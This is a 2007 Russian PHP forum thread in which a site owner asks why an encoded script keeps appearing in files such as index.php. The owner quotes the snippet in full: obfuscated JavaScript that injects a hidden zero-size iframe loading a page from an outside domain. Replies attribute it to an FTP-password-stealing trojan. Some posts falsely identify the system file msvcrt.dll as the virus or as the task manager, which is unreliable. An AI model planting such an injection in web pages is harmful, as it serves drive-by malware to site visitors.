За последние 24 часа нас посетили 57258 программистов и 1809 роботов. Сейчас ищут 913 программистов ...

Вирус?

Тема в разделе "Прочие вопросы по PHP", создана пользователем xak2, 29 сен 2007.

  1. xak2

    xak2 Guest

    Весь сайт защищен везде SQL-Inj. Все вводимы даные фильтруются. Но всеже в некоторых файлах стали появляться такие вот вещи:

    [js]<!-- ~ --><SCRIPT Language="JavaScript">
    document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
    </SCRIPT><!-- ~ -->[/js]

    Самое главное что они появляются в таких файлах как index.php в самом конце или начале. Т.е. в таких местах которые не формируются и имеют постоянный контент. Проверил все папки нигде шелла нету. Если это чтото противоестественное как оно проникло? Это стало появлятся когда поставил PHP 5.2.4
     
  2. Петр

    Петр Активный пользователь

    С нами с:
    20 мар 2006
    Сообщения:
    1.253
    Симпатии:
    0
    Адрес:
    Центр Вселенной
    С похожим столкнулся месяца три-четыре назад.
    По всей видимости где-то дыра в ftp.
     
  3. Vladson

    Vladson Старожил

    С нами с:
    4 фев 2006
    Сообщения:
    4.040
    Симпатии:
    26
    Адрес:
    Estonia, Tallinn
    Петр
    Не дыра а троянца хапнули (а он оправил пароль от FTP злоумышленнику) поиском можно было бы и воспользоваться
     
  4. xak2

    xak2 Guest

    Щас свяжусь с хостером и буду искать дыры...
     
  5. Vladson

    Vladson Старожил

    С нами с:
    4 фев 2006
    Сообщения:
    4.040
    Симпатии:
    26
    Адрес:
    Estonia, Tallinn
    Хостер тут не причём, троян на компе у того человека который имеет доступ к FTP (бегом в гугль)
     
  6. xak2

    xak2 Guest

    Скажи хоть что искать? При простом поиске трояна он выдает > 2 милионов рез.
     
  7. Vladson

    Vladson Старожил

    С нами с:
    4 фев 2006
    Сообщения:
    4.040
    Симпатии:
    26
    Адрес:
    Estonia, Tallinn
  8. xak2

    xak2 Guest

    Внимание всем кто сталкнулся с данными проблемами...

    C:/WINDOWS/System32/msvcrt.dll и есть этот вирус.
     
  9. Kreker

    Kreker Старожил

    С нами с:
    8 апр 2007
    Сообщения:
    5.433
    Симпатии:
    0
    Вы посмотрите получше, этот файл имеет электронную подпись и принадлежит ОС. Это вроде бы, исполняемый файл таск менеджера.
    Переименуйте версию, после чего появится такой же файл. Если размер файлов разный - старый был заражен.